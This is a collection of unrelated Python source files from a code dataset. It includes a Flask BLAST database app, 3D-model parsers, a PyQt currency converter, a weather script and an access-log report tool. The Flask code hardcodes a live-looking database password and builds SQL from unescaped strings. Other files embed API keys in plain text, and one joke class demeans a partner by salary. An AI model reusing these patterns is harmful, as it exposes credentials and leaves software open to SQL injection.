\"...\")\r\n blast_resultaat.append(\"\\n\")\r\n\r\n return blast_resultaat, titel\r\n\r\n\r\ndef adding(add):\r\n \"\"\" Deze functie maakt connectie met de database, en voert een query uit om de max blast_id, actual_id en prot_id\r\n op te halen uit de database. Deze waardes worden + 1 gedaan en worden aan een andere functie meegegeven\r\n\r\n :param add: geeft aan of er resultaat in de database moet worden toegevoegd of niet\r\n \"\"\"\r\n verbinding = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cursor = verbinding.cursor()\r\n query = \"select max(Blast_ID), max(Actual_ID), max(Prot_id) from eiwitten join blast b on \" \\\r\n \"eiwitten.Prot_id = b.Actual_ID join seq_read sr on b.Blast_ID = sr.Read_ID\"\r\n cursor.execute(query)\r\n resultaat = cursor.fetchall()\r\n for item in resultaat:\r\n item = str(item)\r\n item2 = item.split(\",\")\r\n item3 = item2[0].split(\"(\")\r\n blast_id = int(item3[1]) + 1\r\n actual_id = int(item2[1]) + 1\r\n item4 = item2[2].split(\")\")\r\n prot_id = int(item4[0]) + 1\r\n cursor.close()\r\n toevoegen_database(add, blast_id, actual_id, prot_id)\r\n\r\n\r\ndef toevoegen_database(add, blast_id, actual_id, prot_id):\r\n \"\"\" Deze functie opent de resultaten voor de databse van de blast. Daarna maakt hij verbinding met de database,\r\n en gaat dan voor elke regel in het bestand kijken of het de header, sequentie, eiwit, orgnaisme, accessiecode,\r\n score, e_value, querycover of percentage identitys is en wordt dan opgeslagen als een variabele. Als alles een\r\n waarde heeft wordt het toegevoegd in de database, eerst bij de seq_read, dan blast en dan eiwit tabel. Daarna\r\n worden de blast_id, actual_id en prot_id weer +1 gedaan.\r\n\r\n :param add: geeft aan of er resultaat in de database moet worden toegevoegd of niet\r\n :param blast_id: geeft de volgende blast_id mee\r\n :param actual_id: geeft de volgende actual_id mee\r\n :param prot_id: geeft de volgende prot_id meee\r\n :return: nieuwe resultaten in de datbase\r\n \"\"\"\r\n bestand2 = open('resultaten_database.txt', 'r')\r\n verbinding = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cursor = verbinding.cursor()\r\n header = ''\r\n sequentie = ''\r\n eiwit = ''\r\n organisme = ''\r\n accessiecode = ''\r\n score = 0\r\n e_value = 0.0\r\n querycover = 0.0\r\n percentageidentity = 0.0\r\n cursor = verbinding.cursor()\r\n if add is not None:\r\n count = -1\r\n for regel in bestand2:\r\n count += 1\r\n regel = regel.replace(\"\\n\", \"\")\r\n if count == 0:\r\n header = regel\r\n if count == 1:\r\n sequentie = regel\r\n if count == 2:\r\n blast = regel\r\n if regel == \"*** Nieuw resultaat ***\":\r\n if count == 4:\r\n regel2 = regel.split(\":\")\r\n regel3 = regel2[1].split(\"[\")\r\n eiwit = regel3[0]\r\n regel4 = regel3[1].split(\"]\")\r\n organisme = regel4[0]\r\n if count == 5:\r\n regel5 = regel.split(\":\")\r\n accessiecode = regel5[1]\r\n if count == 6:\r\n regel6 = regel.split(\":\")\r\n score = int(regel6[1])\r\n if count == 7:\r\n regel7 = regel.split(\":\")\r\n e_value = float(regel7[1])\r\n if count == 8:\r\n regel8 = regel.split(\":\")\r\n querycover = float(regel8[1])\r\n if count == 9:\r\n regel9 = regel.split(\":\")\r\n percentageidentity = float(regel9[1])\r\n if count == 10:\r\n query_seqread = \"insert into seq_read (Read_ID, Read_type, Header, Sequentie)\" \\\r\n \"values ({}, 1, '{}', '{}')\".format(blast_id, header, sequentie)\r\n cursor.execute(query_seqread)\r\n verbinding.commit()\r\n query_blast = \"insert into blast (Blast_ID, Blast_type, Score, Query_cover, E_value, \" \\\r\n \"Percent_ident, Accessiecode, Organisme, Taxonomie, Actual_ID)\" \\\r\n \"values ({}, '{}', {}, {}, {}, {}, '{}', '{}', '-', {})\".format(blast_id, blast,\r\n score,\r\n querycover, e_value,\r\n percentageidentity,\r\n accessiecode,\r\n organisme, actual_id)\r\n cursor.execute(query_blast)\r\n verbinding.commit()\r\n query_eiwitten = \"insert into eiwitten (Prot_id, Prot_naam, Prot_locatie, Bio_domein, \" \\\r\n \"Bio_proces, Bio_functie)\" \\\r\n \"values ({}, '{}', '-', '-', '-', '-')\".format(prot_id, eiwit)\r\n cursor.execute(query_eiwitten)\r\n verbinding.commit()\r\n count = -1\r\n blast_id = blast_id + 1\r\n actual_id = actual_id + 1\r\n prot_id = prot_id + 1\r\n cursor.close()\r\n\r\n\r\ndef resultaten_database():\r\n \"\"\" Deze functie roep de sequentie en blasttype op, opent de XML file van de blast en een nieuw tesktbestand.\r\n Voor elke regel in het bestand worden eerst de enters weggehaald. Daarna als de regel start met @,\r\n wordt de header en sequentie in het bestand geschreven. Als de regel met Hit begint, wordt hit op True gezet en\r\n wordt de query_lengte, beschrijving, accessiecode, score, E-value en wordt de query cover en de percentage identity\r\n berekent. Dit allemaal wordt in het bestand weggeschreven.\r\n\r\n :return: tesktbestand met resulaten voor de database\r\n \"\"\"\r\n sequentie = request.args.get(\"seq\")\r\n blast = request.args.get(\"blast_type\")\r\n bestand = open(\"resultaat.xml\", 'r')\r\n hit = False\r\n bestand_resultaten = open(\"resultaten_database.txt\", 'w')\r\n for regel in bestand:\r\n regel = regel.replace(\"\\n\", \"\")\r\n if regel == \"\" and sequentie is not None:\r\n hit = True\r\n bestand_resultaten.write(\"@Sequentie_gebruiker\" + \"\\n\")\r\n bestand_resultaten.write(sequentie + \"\\n\")\r\n bestand_resultaten.write(blast + \"\\n\")\r\n if \"\" in regel:\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n query_len = int(split[1])\r\n if hit is True:\r\n if \"\")\r\n bestand_resultaten.write(\"Beschrijving: \" + split[1] + \"\\n\")\r\n if \"\")\r\n bestand_resultaten.write(\"Accessie code: \" + split[1] + \"\\n\")\r\n if \"\" in regel:\r\n # dit geeft de score mee van het resultaat\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n bestand_resultaten.write(\"Score: \" + split[1] + \"\\n\")\r\n if \"\" in regel:\r\n # dit geeft de e-value mee\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n bestand_resultaten.write(\"E-value: \" + split[1] + \"\\n\")\r\n if \"\" in regel:\r\n # dit geeft de query from mee om de query cover te bepalen\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n query_from = int(split[1])\r\n if \"\" in regel:\r\n # dit haalt de query to op en gaat daarna de query cover berekenen\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n query_to = int(split[1])\r\n query_cover = ((int(query_to) - int(query_from)) / int(query_len)) * 100\r\n bestand_resultaten.write(\"Query cover: \" + str(query_cover) + \"\\n\")\r\n if \"\" in regel:\r\n # deze geeft de aantal identitys mee\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n hsp_identity = int(split[1])\r\n if \"\" in regel:\r\n # deze gaat het identity percentage berekenen\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n hsp_align_len = int(split[1])\r\n identity = (int(hsp_identity) / int(hsp_align_len)) * 100\r\n bestand_resultaten.write(\"Percentage Identity: \" + str(identity) + \"\\n\" + \"\\n\")\r\n hit = False\r\n bestand_resultaten.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":32751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"519587920","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : huxiansheng (you@example.org)\n\nimport time\nimport os\nimport HTMLTestRunner\nfrom System_setting.Logger import Logger\nfrom System_setting.Root_directory import Root_xpath\n\nlogger = Logger(logger='Test_report').getlog()\n\n#测试报告格式化\n\nclass Report():\n\n def get_report_path(self):\n root = Root_xpath()\n root_path = root.get_root_path()\n report_path = root_path + '/Data/Report'\n return report_path\n\n\n def Test_report(self,report_title):\n report_path = self.get_report_path()\n # 获取系统当前时间\n month = time.strftime(\"%m\", time.localtime(time.time()))\n day = time.strftime(\"%d\", time.localtime(time.time()))\n report_name = time.strftime(\"%H_%M_%S\", time.localtime(time.time()))\n report_path = report_path + r'/' + month + '月' + r'/' + day+'日'\n report_statu = os.path.exists(report_path)\n # os.makedirs(report_path)\n if report_statu==False:\n os.makedirs(report_path)\n report_path = report_path + '/' +report_name + '-' +report_title+'.html'\n fp = open(report_path, \"wb\")\n # logger.info(':%s已生成!'%report_title)\n return fp,report_path\n\n\n\n\n","sub_path":"System_setting/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"493258076","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\n\nparser functions for 3d objects.\n\n\"\"\"\n\nimport struct\nimport numpy as np\n\n\ndef parse_off(off_file):\n \"\"\"\n .off形式のファイルを読み込み、頂点座標、面を構成する頂点インデックスの配列を返す\n :type off_file: str\n :param off_file: .offファイル名\n :return vertices, faces: 頂点座標のnumpyリスト、面を構成する頂点インデックスnumpyリスト\n \"\"\"\n with open(off_file) as f:\n # コメント・空行を除去\n lines = filter(lambda x: x != '\\n' and x[0] != \"#\", f.readlines())\n\n # 一行目はファイルフォーマット名\n if \"OFF\" not in lines.pop(0):\n raise IOError(\"file must be \\\"off\\\" format file.\")\n\n # 頂点数、面数、辺数\n n_vertices, n_faces, n_edges = map(int, lines.pop(0).split(' '))\n\n # 頂点座標を取得\n vertices = np.array([map(float, lines[i].split(' '))\n for i in xrange(n_vertices)])\n\n # 面を構成する頂点のインデックス\n faces = np.array(\n [map(int, lines[n_vertices + i][3:].rstrip().split(' '))\n for i in xrange(n_faces)])\n\n return vertices, faces\n\n\ndef parse_obj(file_path):\n \"\"\"\n .objファイルを読み込み、頂点情報、法線情報、面情報を取得\n :param file_path: ファイルパス\n :return: 頂点リスト、法線リスト、面リスト\n \"\"\"\n\n with open(file_path) as f:\n lines = filter(lambda x: x != \"\\n\" and x[0] != \"#\",\n [line.strip().split() for line in f.readlines()])\n\n vertices = np.array([list(map(float, line[1:])) for line in lines if\n line[0] == 'v'])\n normals = np.array([list(map(float, line[1:])) for line in lines if\n line[0] == 'vn'])\n # .objファイルではインデックスが1始まりなので、-1する\n faces = np.array(\n [list(map(lambda x: x - 1, map(int, line[1:]))) for line in\n lines if line[0] == 'f'])\n\n return vertices, normals, faces\n\n\ndef parse_binvox(binvox_file):\n \"\"\"\n .binvoxファイルを読み込み、3Dボクセル配列を返す\n :param binvox_file: PATH含むファイル名\n :return: 3Dボクセル配列\n \"\"\"\n\n with open(binvox_file, mode='rb') as f:\n\n # binvox 1\n binvox = f.readline().strip()\n\n # 分割数\n dim = tuple(map(int, f.readline().strip().split()[1:]))\n\n # 標準化の際の平行移動\n trans = tuple(map(float, f.readline().strip().split()[1:]))\n\n # 標準化の際のスケール\n scale = float(f.readline().strip().split()[1])\n\n # data(バイナリスタート)\n data = f.readline()\n\n # ボクセル配列\n array = np.zeros(shape=(dim[0] * dim[1] * dim[2]), dtype=np.uint8)\n\n # 先頭Index\n head = 0\n\n while True:\n # 2バイトずつ取り出し\n binaly = f.read(1)\n num = f.read(1)\n\n # ファイル終端であれば終了\n if binaly == '':\n break\n\n # 0 or 1\n bin_uc = struct.unpack('B', binaly)[0]\n # bin_ucの連続数\n n_uc = struct.unpack('B', num)[0]\n\n # 元々0埋めの配列なので、bin_uc==1の時だけ代入\n if bin_uc == 1:\n array[head:head + n_uc] = 1\n\n # 次の値格納のために、headをn_ucずらす\n head += n_uc\n\n # 3Dにして返戻\n return array.reshape(dim)\n","sub_path":"src/parse3d.py","file_name":"parse3d.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"19573105","text":"class Man:\n \"Ideal partner evaluation. 100% reliable.\"\n\n def __init__(self,salary, your_salary): # (self, age, car, salary, debts)\n self.salary = salary\n self.your_salary = your_salary\n\n def count_money(self):\n\n if self.salary <= self.your_salary:\n print('No money. Dump him.')\n elif self.salary <= 1.5*self.your_salary:\n print('Not very suitable for you. Little money, no perspective.')\n elif self.salary <= 3*self.your_salary:\n print(\"Your target is capable of buying you new clothes every week.\\nVery suitable for you.\")\n else:\n print('Marry him. NOW.')\n\nMarek = Man(8000, 0)\nMarek.count_money()\n","sub_path":"classes_for_dummies.py","file_name":"classes_for_dummies.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3680309","text":"import cv2 as cv\nimport numpy as np\n\nimg = cv.imread(\"15.jpg\")\nhsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n\nlower = np.array([120, 102, 102])\nhigh = np.array([123, 106, 107])\nlowerb = np.array([130, 150, 130])\nhighb = np.array([140, 200, 200])\nlowerb1 = np.array([100, 200, 100])\nhighb1 = np.array([200, 255, 200])\n\nmask = cv.inRange(hsv, lower, high)\nprint(mask)\nres = cv.bitwise_and(img, img, mask=mask)\n\ncv.imshow(\"img\", img)\ncv.imshow(\"mask\", hsv)\ncv.waitKey(0)\n","sub_path":"untitled1788/opencv/HSV.py","file_name":"HSV.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"10174509","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nimport requests\n\nclass deneme(QWidget):\n def __init__(self):\n super().__init__()\n self.olayUI()\n def olayUI(self):\n \n \n API_key = \"804d4e971d71cf74913729400d0a5885\"\n url = \"http://data.fixer.io/api/latest?access_key=\"+API_key\n cevap = requests.get(url)\n self.kurlar = cevap.json()\n \n \n\n self.yazialani = QLabel()\n self.yazialani2 = QLabel()\n self.yazialani3 = QLabel('Eldeki Dövizin Cinsi')\n self.yazialani4 = QLabel('Çevrilecek Dövizin Cinsi')\n self.yazialani5 = QLabel('Tutar')\n self.buton = QPushButton(\"Cevir\")\n self.buton2 = QPushButton(\"Temizle\")\n self.cinsgir1 = QLineEdit()\n self.cinsgir2 = QLineEdit()\n self.tutargir = QLineEdit()\n\n self.yazialani2.setText('Döviz Çevirici, Dolar, Euro, TL, Tüm Dünya Kurları..
')\n self.yazialani2.setAlignment(Qt.AlignBottom)\n self.setGeometry(200,75,550,900)\n self.logo = QLabel()\n self.logo.setPixmap(QPixmap(\"logo.png\"))\n self.logo.setAlignment(Qt.AlignCenter)\n\n \n\n\n\n v_box = QVBoxLayout()\n h_box = QHBoxLayout()\n\n v_box.addStretch()\n v_box.addWidget(self.yazialani2)\n v_box.addStretch()\n v_box.addWidget(self.logo)\n v_box.addStretch()\n v_box.addWidget(self.yazialani3)\n v_box.addWidget(self.cinsgir1)\n v_box.addStretch()\n v_box.addWidget(self.yazialani4)\n v_box.addWidget(self.cinsgir2)\n v_box.addStretch()\n v_box.addWidget(self.yazialani5)\n v_box.addWidget(self.tutargir)\n v_box.addStretch()\n v_box.addWidget(self.buton)\n v_box.addStretch()\n v_box.addWidget(self.yazialani)\n v_box.addStretch()\n\n v_box.addWidget(self.buton2)\n v_box.addStretch()\n\n \n h_box.addLayout(v_box)\n h_box.addStretch()\n self.setWindowTitle(\"DÖVİZ ÇEVİRİ PROGRAMI € $ ₺\")\n self.setLayout(h_box)\n\n self.buton.clicked.connect(self.butonclicked)\n self.buton2.clicked.connect(self.temizle)\n self.setWindowIcon(QIcon(\"h2.png\"))\n \n self.show()\n\n def butonclicked(self):\n d_cins = self.cinsgir1.text()\n d_cins2 = self.cinsgir2.text()\n d_cins = d_cins.upper()\n d_cins2 = d_cins2.upper()\n \n kur1 = self.kurlar[\"rates\"][d_cins]\n kur2 = self.kurlar[\"rates\"][d_cins2]\n sonuc = (kur2 / kur1) \n print(\"kur\",sonuc)\n\n bbb = float(self.tutargir.text())\n ccc = sonuc * bbb\n ddd = round(ccc,2)\n self.yazialani.setText(str(ddd))\n \n def temizle(self):\n self.cinsgir1.clear()\n self.cinsgir2.clear()\n self.tutargir.clear()\n self.yazialani.clear()\n \n\napp = QApplication(sys.argv)\npencere = deneme()\nsys.exit(app.exec_())\n","sub_path":"currency_conv_1.0.py","file_name":"currency_conv_1.0.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"117568292","text":"import requests\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('country_code', metavar='N', type=str, help='country code')\nparser.add_argument('-l', type=str, help='name of location')\nparser.add_argument('-i', type=int, help='id location')\np = parser.parse_args()\n\nif p.i != None:\n r = requests.get(\n 'http://api.openweathermap.org/data/2.5/weather?id={0}&appid=ff9853a87b307198d1cb16c5265804dd'.format(\n p.i))\n r_temp = dict(r.json())['main']['temp'] - 273.15\n s = 'Current temp: {0:.3}{1}C'.format(r_temp, repr('u00B0')) # xb0\n print(s)\nelif p.l != None:\n r = requests.get(\n 'http://api.openweathermap.org/data/2.5/weather?q={0},{1}&appid=ff9853a87b307198d1cb16c5265804dd'.format(\n p.l, p.country_code))\n r_temp = dict(r.json())['main']['temp'] - 273.15\n s = 'Current temp: {0:.3}{1}C'.format(r_temp, repr('u00B0')) # xb0 \\u2103\n print(s)","sub_path":"lect_6/lect_6_1.py","file_name":"lect_6_1.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323320191","text":"#!/usr/bin/env python\n\nimport re\nimport json\nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\n\n# RegEx patterns\nERRLINE_RE = re.compile(r':\\d*\\)')\nkeepPunct_RE = r'|\\||\\&|\\#|\\@|\\~|\\_|\\'|\\\"|\\=|\\\\|\\/|\\-|\\:|\\;|\\*|\\.|\\$|\\(|\\)|\\[|\\]|\\{|\\}'\nTOKEN_PATTERN = re.compile(r'(?u)\\b\\w\\w+\\b' + keepPunct_RE)\n\n# Lambda functions\ntokenize = lambda line: TOKEN_PATTERN.findall(line)\nerrline = lambda line: ERRLINE_RE.sub(':_xerrx_)', line)\n\n# Out Of Vocabulary default token value\n#oov = 11999\n\n\nclass Vectorizer:\n def __init__(self, oov_val=11999, dictionary_path=None):\n self.oov = oov_val\n self.token_dict = None\n if dictionary_path:\n self.token_dict = self.read_dict(dictionary_path)\n\n def read_dict(self, dict_path):\n with open(dict_path, 'r') as _in:\n return json.load(_in)\n\n def dump_dict(self, output_path):\n with open(output_path, 'w') as out:\n json.dump(self.token_dict, out, indent=2)\n\n def build_dict(self, doc_path):\n token = Tokenizer(filters='')\n posts = []\n with open(doc_path, 'r') as f:\n for line in f:\n posts.append(' '.join(tokenize(errline(line.strip().lower()))))\n # fit tokenizer on posts and create token index\n token.fit_on_texts(posts)\n self.token_dict = token.word_index\n\n def vectorize_doc(self, doc_path):\n # encode post tokens using the provided dictionary\n enc_doc = []\n with open(doc_path, 'r') as f:\n for line in f:\n enc_doc.append(self.vectorize_string(line))\n return enc_doc\n\n def vectorize_list(self, doc_list):\n enc_doc = []\n for line in doc_list:\n enc_doc.append(self.vectorize_string(line))\n return enc_doc\n\n def vectorize_string(self, string):\n string = ' '.join(tokenize(errline(string.strip().lower())))\n return np.array(\n [self.token_dict.get(t, self.oov) for t in string.split()])\n\n\nif __name__ == '__main__':\n # build token dictionary on the selected and labeled posts\n vectorizer = Vectorizer()\n vectorizer.build_dict('training_data/raw_data/labeled_posts')\n vectorizer.dump_dict('data/token_dictionary.json')\n","sub_path":"src/post_classifier/vectorizer.py","file_name":"vectorizer.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"262908196","text":"import os\nimport shutil\nimport calendar\nimport openpyxl\nfrom openpyxl import Workbook\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\nfrom openpyxl.utils import get_column_letter\n\nmonth = [None, 'янв.', 'фев.', 'мар.', 'апр.', 'май.', 'июн.', 'июл.', 'авг.', 'сен. ', 'окт.', 'ноя.', 'дек.']\noriginal_header = ['Порядковый №', 'Сотрудник (Посетитель)', 'Дата', 'Время', 'Подразделение', 'Событие',\n 'Устройство', 'Помещение', 'Пользователь', 'Категория события', 'Подкатегория события',\n 'Дата и время записи']\ndate = calendar.Calendar()\ncontractors = {}\n\n\ndef parsing(filename, day_month):\n wb = openpyxl.load_workbook(filename)\n sheet = wb.active\n rows = sheet.max_row\n columns = sheet.max_column\n header = [row.value for row in sheet[4]]\n if header == original_header:\n for row in range(5, rows + 1):\n string = ''\n for column in range(2, columns + 1):\n cell = sheet.cell(row=row, column=column)\n string = string + str(cell.value) + ';'\n string = string.split(';')\n sorted(string, day_month)\n else:\n print('Неправильный формат отчета')\n\n\ndef sorted(string, day_month):\n person = string[0]\n date = string[1]\n day = int(date.split('.')[0])\n contract = string[3]\n zone = string[6]\n if contract not in contractors.keys():\n contractors[contract] = {\n zone: {\n 'total_month': 1,\n 'total_day': [0] * day_month,\n date: {\n 'day_people': 1,\n 'person': [person]\n }\n }\n }\n contractors[contract][zone]['total_day'][day - 1] += 1\n else:\n if zone not in contractors[contract].keys():\n contractors[contract][zone] = {\n 'total_month': 1,\n 'total_day': [0] * day_month,\n date: {\n 'day_people': 1,\n 'person': [person]\n }\n }\n contractors[contract][zone]['total_day'][day - 1] += 1\n elif date not in contractors[contract][zone].keys():\n contractors[contract][zone][date] = {'day_people': 1, 'person': [person]}\n contractors[contract][zone]['total_month'] += 1\n contractors[contract][zone]['total_day'][day - 1] += 1\n else:\n if person not in contractors[contract][zone][date]['person']:\n contractors[contract][zone][date]['person'].append(person)\n contractors[contract][zone][date]['day_people'] += 1\n contractors[contract][zone]['total_month'] += 1\n contractors[contract][zone]['total_day'][day - 1] += 1\n\n\n\ndef create_file(filename, filepath, date_list):\n filename = filename.split('/')[1]\n\n font = Font(name='Times New Roman',\n size=12,\n bold=False,\n italic=False,\n vertAlign=None,\n underline='none',\n strike=False,\n color='FF000000')\n\n font_top = Font(name='Times New Roman',\n size=12,\n bold=True,\n italic=False,\n vertAlign=None,\n underline='none',\n strike=False,\n color='FF000000')\n\n border = Border(left=Side(border_style='thin',\n color='FF000000'),\n right=Side(border_style='thin',\n color='FF000000'),\n top=Side(border_style='thin',\n color='FF000000'),\n bottom=Side(border_style='thin',\n color='FF000000'),\n diagonal=Side(border_style='thin',\n color='FF000000'),\n diagonal_direction=0,\n outline=Side(border_style='thin',\n color='FF000000'),\n vertical=Side(border_style='thin',\n color='FF000000'),\n horizontal=Side(border_style='thin',\n color='FF000000')\n )\n\n align_center = Alignment(horizontal='center',\n vertical='bottom',\n text_rotation=0,\n wrap_text=False,\n shrink_to_fit=False,\n indent=0)\n\n align_top = Alignment(horizontal='center',\n vertical='center',\n text_rotation=0,\n wrap_text=False,\n shrink_to_fit=False,\n indent=0)\n\n wb = Workbook()\n ws = wb.active\n position = {} # Временное хранилище позиций в таблице в зависимости от территории\n wb.remove(wb.active) # Удаление дефолтного листа\n for contractor in contractors.keys():\n for zone in contractors[contractor].keys():\n col = 5\n if zone not in wb.sheetnames: # Если в книге нет листа территории\n position[zone] = {'start_row': 5, 'start_column': 2, 'index': 1, 'day': 5} # Обозначение стартовых позиций\n ws = wb.create_sheet(zone)\n\n ws['E2'] = 'Отчет нахождения на объекте {}'.format(filename)\n ws['E2'].font = font_top\n # ---------------#\n ws['B4'] = '№'\n ws.column_dimensions['B'].width = 5\n # ---------------#\n ws['C4'] = 'Подрядчик'\n ws.column_dimensions['C'].width = 35\n # ---------------#\n ws['D4'] = 'Человек за месяц'\n ws.column_dimensions['D'].width = 19\n # ---------------#\n for i in date_list:\n ws.cell(row=4, column=col).value = i\n col += 1\n ws = wb[zone] # Выбрать активным лист согласно территории\n ws.cell(row=position[zone]['start_row'],\n column=position[zone]['start_column']).value = position[zone]['index']\n ws.cell(row=position[zone]['start_row'],\n column=position[zone]['start_column']+1).value = contractor\n ws.cell(row=position[zone]['start_row'],\n column=position[zone]['start_column']+2).value = contractors[contractor][zone]['total_month']\n for day_value in contractors[contractor][zone]['total_day']:\n ws.cell(row=position[zone]['start_row'], column=position[zone]['day']).value = day_value\n position[zone]['day'] += 1\n position[zone]['day'] = 5\n position[zone]['index'] = position[zone]['index'] + 1\n position[zone]['start_row'] = position[zone]['start_row'] + 1\n\n for sheet in wb.sheetnames:\n ws = wb[sheet]\n for row in range(4, ws.max_row+1):\n for column in range(2, ws.max_column+1):\n cell = ws.cell(row=row, column=column)\n cell.border = border\n cell.font = font\n if row >= 4 and column == 2: # Форматирования столбца №\n cell.alignment = align_center\n if row == 4 and column >= 2:\n cell.font = font_top\n cell.alignment = align_top\n if column >= 5:\n i = get_column_letter(column)\n ws.column_dimensions[i].width = 10\n wb.save(filepath)\n\ndef start():\n folders = [folder for folder in os.walk('Отчеты')]\n for folder in folders[1:]:\n for file in folder[2]:\n if file.endswith('.xlsx') and file.startswith('События') and not folder[0].endswith('old'):\n file_month = month.index(file.split(' ')[-3])\n file_year = int(file.split(' ')[-2])\n date_list = []\n for i in date.itermonthdates(file_year, file_month):\n if i.month == file_month:\n date_list.append(i.strftime('%d.%m.%Y'))\n perco_file = os.path.join('', folder[0], file)\n print('Файл {}'.format(perco_file))\n parsing(perco_file, len(date_list))\n create_file(folder[0],\n os.path.join('', folder[0], 'Отчет нахождения на объекте {}'.format(' '.join(file.split(' ')[1:]))),\n date_list)\n contractors.clear()\n shutil.copy2(perco_file, os.path.join(folder[0], 'old', file))\n os.remove(perco_file)\n\n\nif __name__ == \"__main__\":\n start()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522799800","text":"import requests \nimport json\n\ndef return_category(para):\n r1 = requests.post('https://pribot.org/api/getCategories',\n json={'key': 'xXaJt4QsteETBAa8UY4G4QZeMHRK7upUdf2XrFQZQpN', 'texts': [para]},\n headers={'Content-Type': 'application/json'},\n cookies={},)\n \n resp = r1.json()\n\n #Saving category labels (in order of confidence 0 is most, etc...)\n cat_strs = resp['category_classes']\n cat_strs_list = cat_strs.split(\",\")\n cat_strs_list_cleaned = []\n for item in cat_strs_list:\n clean = item.replace(\" \",\"\")\n cleaner = clean.replace(\"[[\",\"\")\n cleanest = cleaner.replace(\"'\",\"\")\n ultra_clean = cleanest.replace(\"]]\",\"\")\n cat_strs_list_cleaned.append(ultra_clean)\n\n #Saving category confidence scores (in same order as above...)\n cat_scores = resp['category_scores']\n cat_scores_list = cat_scores.split(\",\")\n cat_scores_list_cleaned = []\n for item in cat_scores_list:\n clean = item.replace(\" \",\"\")\n cleaner = clean.replace(\"[[\",\"\")\n cleanest = cleaner.replace(\"'\",\"\")\n ultra_clean = cleanest.replace(\"]]\",\"\")\n cat_scores_list_cleaned.append(ultra_clean)\n #print type(cat_scores_list_cleaned[0])\n\n cat_score_over = []\n cat_over = []\n\n for i in range(len(cat_strs_list_cleaned)):\n if float(str(cat_scores_list_cleaned[i])) >= .7:\n cat_over.append(cat_strs_list_cleaned[i])\n #print(cat_scores_list_cleaned[i])\n #print(\"---------------------------\")\n #print(cat_strs_list_cleaned[i])\n #print(\"---------------------------\")\n cat_score_over.append(cat_scores_list_cleaned[i])\n\n to_return = (para, zip(cat_over, cat_score_over), cat_over)\n\n #print(\"------------------------------------------\")\n #print(to_return[2])\n results = list(zip(cat_over,cat_score_over))\n return results\n'''\ntotal_count = 100\nsuccess_count = 0\ntest_results = []\nfor i in range(total_count):\n orig_text = raw_input(\"What piece of text would you like to test?... \\n\")\n orig_result = return_category(orig_text)\n\n adv_text = raw_input(\"What piece of adversarial text would you like to test... \\n\")\n adv_result = return_category(adv_text)\n\n test_results.append((orig_result, adv_result))\n\n to_compare = orig_result[2]\n to_compare2 = adv_result[2]\n\n results_add = set(to_compare + to_compare2)\n\n if len(results_add) == (len(to_compare2) + len(to_compare)):\n success_count+=1\n\nsuccess_rate = (success_count/total_count) * 100\n\n#print success_rate\n'''\n\n","sub_path":"accuracy_check.py","file_name":"accuracy_check.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"526892973","text":"\"\"\"@file galaxycluster.py\nThe GalaxyCluster class\n\"\"\"\nimport pickle\nfrom .gcdata import GCData\n\nclass GalaxyCluster():\n \"\"\"Object that contains the galaxy cluster metadata and background galaxy data\n\n Attributes\n ----------\n unique_id : int or string\n Unique identifier of the galaxy cluster\n ra : float\n Right ascension of galaxy cluster center (in degrees)\n dec : float\n Declination of galaxy cluster center (in degrees)\n z : float\n Redshift of galaxy cluster center\n galcat : GCData\n Table of background galaxy data containing at least galaxy_id, ra, dec, e1, e2, z\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.unique_id = None\n self.ra = None\n self.dec = None\n self.z = None\n self.galcat = None\n if len(args)>0 or len(kwargs)>0:\n self._add_values(*args, **kwargs)\n self._check_types()\n def _add_values(self, unique_id: str, ra: float, dec: float, z: float,\n galcat: GCData):\n \"\"\"Add values for all attributes\"\"\"\n 